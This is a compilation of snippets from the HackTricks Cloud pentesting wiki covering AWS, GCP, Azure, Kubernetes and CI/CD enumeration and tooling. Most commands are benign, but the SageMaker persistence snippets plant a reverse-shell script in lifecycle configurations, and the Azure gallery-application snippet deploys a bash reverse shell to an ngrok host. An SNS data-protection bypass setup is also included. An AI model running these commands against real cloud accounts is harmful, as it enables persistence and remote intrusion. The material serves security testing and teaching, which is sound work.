https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md Commands to list and describe MLflow tracking servers, AutoML jobs, and JumpStart resources. ```bash aws sagemaker list-mlflow-tracking-servers --region $REGION aws sagemaker describe-mlflow-tracking-server --tracking-server-name --region $REGION aws sagemaker list-auto-ml-jobs --region $REGION aws sagemaker describe-auto-ml-job --auto-ml-job-name --region $REGION aws sagemaker list-jumpstart-models --region $REGION aws sagemaker list-jumpstart-script-resources --region $REGION ``` -------------------------------- ### Install Prowler Security Scanner Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/pentesting-cloud-methodology.md Installs the Prowler security tool using pip and verifies the installation by checking its version. Prowler supports AWS, GCP, and Azure. ```bash pip install prowler prowler -v ``` -------------------------------- ### Install Airflow with Helm on Minikube Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/apache-airflow-security/README.md Use Helm to install Apache Airflow on a Minikube cluster. This command adds the Airflow Helm repository and installs the Airflow release. ```bash helm repo add airflow-stable https://airflow-helm.github.io/charts helm repo update helm install airflow-release airflow-stable/airflow # Some information about how to aceess the web console will appear after this command # Use this command to delete it helm delete airflow-release ``` -------------------------------- ### Start a Minikube Cluster Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md Initiates a local Kubernetes cluster using Minikube. This command automatically selects a driver, downloads necessary images, and configures the cluster. ```bash $ minikube start 😄 minikube v1.19.0 on Ubuntu 20.04 ✨ Automatically selected the virtualbox driver. Other choices: none, ssh 💿 Downloading VM boot image ... > minikube-v1.19.0.iso.sha256: 65 B / 65 B [-------------] 100.00% ? p/s 0s > minikube-v1.19.0.iso: 244.49 MiB / 244.49 MiB 100.00% 1.78 MiB p/s 2m17. 👍 Starting control plane node minikube in cluster minikube 💾 Downloading Kubernetes v1.20.2 preload ... > preloaded-images-k8s-v10-v1...: 491.71 MiB / 491.71 MiB 100.00% 2.59 MiB 🔥 Creating virtualbox VM (CPUs=2, Memory=3900MB, Disk=20000MB) ... 🐳 Preparing Kubernetes v1.20.2 on Docker 20.10.4 ... ▪ Generating certificates and keys ... ▪ Booting up control plane ... ▪ Configuring RBAC rules ... 🔎 Verifying Kubernetes components... ▪ Using image gcr.io/k8s-minikube/storage-provisioner:v5 🌟 Enabled addons: storage-provisioner, default-storageclass 🏄 Done! kubectl is now configured to use "minikube" cluster and "default" namespace by defaul ``` -------------------------------- ### Setup SNS Topic and SQS Queue Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-data-protection-bypass.md Creates the infrastructure required to test the policy bypass. ```bash TOPIC_ARN=$(aws sns create-topic --name ht-dlp-bypass-$(date +%s) --region $REGION --query TopicArn --output text) Q_URL=$(aws sqs create-queue --queue-name ht-dlp-exfil-$(date +%s) --region $REGION --query QueueUrl --output text) Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text) aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION --attributes Policy=Version:2012-10-17 ``` -------------------------------- ### Install Google Cloud SDK in Docker Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md Installs the Google Cloud SDK within a Docker image. This involves downloading the SDK archive, extracting it, and running the installation script. ```bash curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz mkdir -p /usr/local/gcloud tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz /usr/local/gcloud/google-cloud-sdk/install.sh ``` -------------------------------- ### Create Mount Point and Mount Disk Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md Create a directory to serve as a mount point and then mount a disk device to it. ```bash sudo mkdir -p /mnt/disks/[MOUNT_DIR] ``` ```bash sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR] ``` -------------------------------- ### Install PowerShell on macOS Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md Installs the latest stable release of PowerShell using Homebrew. ```bash brew install powershell/tap/powershell ``` -------------------------------- ### Manage Lifecycle Configuration on Notebook Instances Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence/README.md Commands to create and attach a Lifecycle Configuration to a notebook instance. ```bash # Create Lifecycle Configuration* aws sagemaker create-notebook-instance-lifecycle-config \ --notebook-instance-lifecycle-config-name attacker-lcc \ --on-start Content=$(base64 -w0 reverse_shell.sh) # Attach Lifecycle Configuration to Notebook Instance* aws sagemaker update-notebook-instance \ --notebook-instance-name victim-instance \ --lifecycle-config-name attacker-lcc ``` -------------------------------- ### Create Studio Lifecycle Configurations by App Type Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence/README.md Commands to create Lifecycle Configurations for specific SageMaker Studio application types. ```bash aws sagemaker create-studio-lifecycle-config \ --studio-lifecycle-config-name attacker-jupyter-lcc \ --studio-lifecycle-config-app-type JupyterServer \ --studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh) ``` ```bash aws sagemaker create-studio-lifecycle-config \ --studio-lifecycle-config-name attacker-kernelgateway-lcc \ --studio-lifecycle-config-app-type KernelGateway \ --studio-lifecycle-config-content $(base64 -w0 kernel_persist.sh) ``` ```bash aws sagemaker create-studio-lifecycle-config \ --studio-lifecycle-config-name attacker-codeeditor-lcc \ --studio-lifecycle-config-app-type CodeEditor \ --studio-lifecycle-config-content $(base64 -w0 editor_persist.sh) ``` -------------------------------- ### Jenkins Secret Example Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/jenkins-security/README.md An example of how a Jenkins secret might appear in the credentials.xml file. ```xml credentials.xml: {AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==} ``` -------------------------------- ### Create and Deploy Azure Gallery Application Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md Steps to create a gallery, define an application, and deploy it to a virtual machine. ```powershell $rg = "rg-name" $location = "Central US" $galleryName = "myGallery" $appName = "myReverseShellApp" $subscription="subscription-id" # Create gallery New-AzGallery -ResourceGroupName $rg -Name $galleryName -Location $location # Create app in gallery New-AzGalleryApplication ` -ResourceGroupName $rg ` -GalleryName $galleryName ` -Name $appName ` -Location $location ` -SupportedOSType Linux # Create app version $versionName = "1.0.2" ## create ngrok listener New-AzGalleryApplicationVersion ` -ResourceGroupName $rg ` -GalleryName $galleryName ` -GalleryApplicationName $appName ` -Name $versionName ` -Location $location ` -PackageFileLink "$sasToken" ` -Install "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" ` -Remove "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" ` -Update "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" # Launch app $appVersionId = "/subscriptions/$subscription/resourceGroups/$rg/providers/Microsoft.Compute/galleries/$galleryName/applications/$appName/versions/$versionName" $app = New-AzVmGalleryApplication -PackageReferenceId $appVersionId $vm = Get-AzVM -ResourceGroupName $rg -Name $vmName Add-AzVmGalleryApplication -VM $vm -GalleryApplication $app Update-AzVM -ResourceGroupName $rg -VM $vm ``` -------------------------------- ### View Startup Script Output Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md Check the output of startup scripts on a VM instance using journalctl. ```bash sudo journalctl -u google-startup-scripts.service ``` -------------------------------- ### Launch ROADrecon GUI Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/azure-security/az-enumeration-tools.md Start the ROADrecon web UI to explore the collected dataset. The GUI helps visualize relationships between privileged users, roles, and devices. ```bash roadrecon gui ``` -------------------------------- ### Install Terrascan via Homebrew Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/terraform-security.md Install the Terrascan tool using the Homebrew package manager. ```bash brew install terrascan ``` -------------------------------- ### Install and Scan with Terrascan Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/terraform-security.md Install Terrascan using Homebrew and scan a directory for IaC misconfigurations. ```bash brew install terrascan terrascan scan -d /path/to/folder ``` -------------------------------- ### Programmatic POST Request via FlareProx Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-ci-cd/cloudflare-security/cloudflare-workers-pass-through-proxy-ip-rotation.md Python example demonstrating how to initialize FlareProx, ensure endpoints exist, and send a POST request through a random worker endpoint. ```python #!/usr/bin/env python3 from flareprox import FlareProx, FlareProxError import json # Initialize flareprox = FlareProx(config_file="flareprox.json") if not flareprox.is_configured: print("FlareProx not configured. Run: python3 flareprox.py config") exit(1) # Ensure endpoints exist endpoints = flareprox.sync_endpoints() if not endpoints: print("Creating proxy endpoints...") flareprox.create_proxies(count=2) # Make a POST request through a random endpoint try: post_data = json.dumps({ "username": "testuser", "message": "Hello from FlareProx!", "timestamp": "2025-01-01T12:00:00Z" }) headers = { "Content-Type": "application/json", "User-Agent": "FlareProx-Client/1.0" } response = flareprox.redirect_request( target_url="https://httpbin.org/post", method="POST", headers=headers, data=post_data ) if response.status_code == 200: result = response.json() print("✓ POST successful via FlareProx") print(f"Origin IP: {result.get('origin', 'unknown')}") print(f"Posted data: {result.get('json', {})}") else: print(f"Request failed with status: {response.status_code}") except FlareProxError as e: print(f"FlareProx error: {e}") except Exception as e: print(f"Request error: {e}") ``` -------------------------------- ### List and Describe Backups Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md Enumerate available backups for a Cloud SQL instance and retrieve detailed information about a specific backup. ```bash gcloud sql backups list --instance gcloud sql backups describe --instance ``` -------------------------------- ### Install Dependencies for dsnap Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md Installs the necessary Python package and package managers for using dsnap. ```bash # Install dependencies pip install 'dsnap[cli]' brew install vagrant brew install virtualbox ``` -------------------------------- ### Submit a build with a configuration file Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md Submits a build to Cloud Build using a specified configuration file and region. This command clones a sample project and then submits it for building. ```bash git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \ cd cloud-console-sample-build && \ gcloud builds submit --config cloudbuild.yaml --region=global ``` -------------------------------- ### List SageMaker Notebook Instance Lifecycle Configurations Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md Lists available lifecycle configurations for SageMaker notebook instances. These scripts run during notebook instance creation or startup. ```bash aws sagemaker list-notebook-instance-lifecycle-configs --region $REGION ``` -------------------------------- ### Test Pod Deployment with Admission Controller Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md Commands to deploy a test pod and observe the behavior of the admission controller. ```bash kubectl run nginx --image nginx kubectl get po -w ``` -------------------------------- ### App Engine Manifest Example Source: https://github.com/hacktricks-wiki/hacktricks-cloud/blob/master/src/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md Example of a manifest.json file describing application components and their source URLs. ```json {"requirements.txt":{"sourceUrl":"https://storage.googleapis.com/staging.onboarding-host-98efbf97812843.appspot.com/a270eedcbe2672c841251022b7105d340129d108","sha1Sum":"a270eedc_be2672c8_41251022_b7105d34_0129d108"},"main_test.py":{"sourceUrl":"https://storage.googleapis.com/staging.onboarding-host-98efbf97812843.appspot.com/0ca32fd70c953af94d02d8a36679153881943f32","sha1Sum":"0ca32fd7_0c953af9_4d02d8a ..."} ```